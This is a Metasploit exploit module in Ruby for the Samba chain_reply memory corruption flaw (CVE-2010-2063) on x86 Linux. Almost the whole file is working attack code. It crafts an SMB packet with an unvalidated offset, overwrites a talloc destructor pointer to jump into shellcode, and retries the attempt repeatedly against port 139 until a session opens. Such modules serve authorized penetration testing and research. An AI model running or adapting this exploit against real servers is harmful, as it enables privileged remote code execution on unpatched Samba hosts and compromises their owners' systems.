2010-07-16 02:31:37 +00:00
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##
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# This module requires Metasploit: http://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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2010-07-16 02:31:37 +00:00
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = GoodRanking
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include Msf::Exploit::Remote::SMB::Client
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include Msf::Exploit::Brute
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'Samba chain_reply Memory Corruption (Linux x86)',
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'Description' => %q{
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This exploits a memory corruption vulnerability present in Samba versions
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prior to 3.3.13. When handling chained response packets, Samba fails to validate
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the offset value used when building the next part. By setting this value to a
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number larger than the destination buffer size, an attacker can corrupt memory.
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Additionally, setting this value to a value smaller than 'smb_wct' (0x24) will
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cause the header of the input buffer chunk to be corrupted.
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After close inspection, it appears that 3.0.x versions of Samba are not
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exploitable. Since they use an "InputBuffer" size of 0x20441, an attacker cannot
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cause memory to be corrupted in an exploitable way. It is possible to corrupt the
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heap header of the "InputBuffer", but it didn't seem possible to get the chunk
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to be processed again prior to process exit.
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In order to gain code execution, this exploit attempts to overwrite a "talloc
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chunk" destructor function pointer.
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This particular module is capable of exploiting the flaw on x86 Linux systems
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that do not have the nx memory protection.
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NOTE: It is possible to make exploitation attempts indefinitely since Samba forks
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for user sessions in the default configuration.
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},
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'Author' =>
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[
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'Jun Mao', #Initial discovery
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'jduck'
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],
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'License' => MSF_LICENSE,
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'References' =>
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[
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[ 'CVE', '2010-2063' ],
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[ 'OSVDB', '65518' ],
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[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873' ]
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],
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'Privileged' => true,
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'Payload' =>
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{
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'Space' => 0x600,
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'BadChars' => "",
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},
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'Platform' => 'linux',
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'Targets' =>
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[
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[ 'Linux (Debian5 3.2.5-4lenny6)',
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{
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'Offset2' => 0x1fec,
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'Bruteforce' =>
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{
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'Start' => { 'Ret' => 0x081ed5f2 }, # jmp ecx (smbd bin)
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'Stop' => { 'Ret' => 0x081ed5f2 },
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'Step' => 0x300 # not used
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}
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}
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],
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[ 'Debugging Target',
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{
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'Offset2' => 0x1fec,
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'Bruteforce' =>
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{
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'Start' => { 'Ret' => 0xAABBCCDD },
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'Stop' => { 'Ret' => 0xAABBCCDD },
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'Step' => 0x300
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}
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}
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],
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],
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'DefaultTarget' => 0,
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'DisclosureDate' => 'Jun 16 2010'))
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register_options(
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[
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Opt::RPORT(139)
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], self.class)
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end
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#
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# Note: this code is duplicated from lib/rex/proto/smb/client.rb
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#
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# Authenticate using clear-text passwords
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#
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def session_setup_clear_ignore_response(user = '', pass = '', domain = '')
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data = [ pass, user, domain, self.simple.client.native_os, self.simple.client.native_lm ].collect{ |a| a + "\x00" }.join('');
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pkt = CONST::SMB_SETUP_LANMAN_PKT.make_struct
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self.simple.client.smb_defaults(pkt['Payload']['SMB'])
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pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
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pkt['Payload']['SMB'].v['Flags1'] = 0x18
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pkt['Payload']['SMB'].v['Flags2'] = 0x2001
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pkt['Payload']['SMB'].v['WordCount'] = 10
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pkt['Payload'].v['AndX'] = 255
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pkt['Payload'].v['MaxBuff'] = 0xffdf
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pkt['Payload'].v['MaxMPX'] = 2
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pkt['Payload'].v['VCNum'] = 1
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pkt['Payload'].v['PasswordLen'] = pass.length + 1
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pkt['Payload'].v['Capabilities'] = 64
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pkt['Payload'].v['SessionKey'] = self.simple.client.session_id
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pkt['Payload'].v['Payload'] = data
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self.simple.client.smb_send(pkt.to_s)
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ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_SESSION_SETUP_ANDX, true)
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end
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def brute_exploit(addrs)
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curr_ret = addrs['Ret']
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# Although ecx always points at our buffer, sometimes the heap data gets modified
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# and nips off the final byte of our 5 byte jump :(
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#
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# Solution: try repeatedly until we win.
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#
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50.times{
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begin
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print_status("Trying return address 0x%.8x..." % curr_ret)
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connect
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self.simple.client.session_id = rand(31337)
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#select(nil,nil,nil,2)
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#puts "press any key"; $stdin.gets
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#
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# This allows us to allocate a talloc_chunk after the input buffer.
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# If doing so fails, we are lost ...
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#
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10.times {
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session_setup_clear_ignore_response('', '', '')
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}
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# We re-use a pointer from the stack and jump back to our original "inbuf"
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distance = target['Offset2'] - 0x80
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jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{distance}").encode_string
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tlen = 0xc00
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trans =
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"\x00\x04" +
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"\x08\x20" +
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"\xff"+"SMB"+
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# SMBlogoffX
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[0x74].pack('V') +
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# tc->next, tc->prev
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jmp_back + ("\x42" * 3) +
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#("A" * 4) + ("B" * 4) +
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# tc->parent, tc->child
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"CCCCDDDD" +
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# tc->refs, must be zero
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("\x00" * 4) +
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# over writes tc->destructor
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[addrs['Ret']].pack('V') +
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"\x00\x00\x00\x00"+
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"\xd0\x07\x0c\x00"+
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"\xd0\x07\x0c\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\xd0\x07"+
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"\x43\x00\x0c\x00"+
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"\x14\x08\x01\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\x00\x00"+
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"\x00\x00\x90"
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# We put the shellcode first, since only part of this packet makes it into memory.
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trans << payload.encoded
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trans << rand_text(tlen - trans.length)
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# Set what eventually becomes 'smb_off2' to our unvalidated offset value.
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smb_off2 = target['Offset2']
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trans[39,2] = [smb_off2].pack('v')
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sock.put(trans)
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rescue EOFError
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# nothing
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rescue => e
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print_error("#{e}")
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end
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handler
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disconnect
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# See if we won yet..
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select(nil,nil,nil, 1)
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break if session_created?
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}
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end
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end
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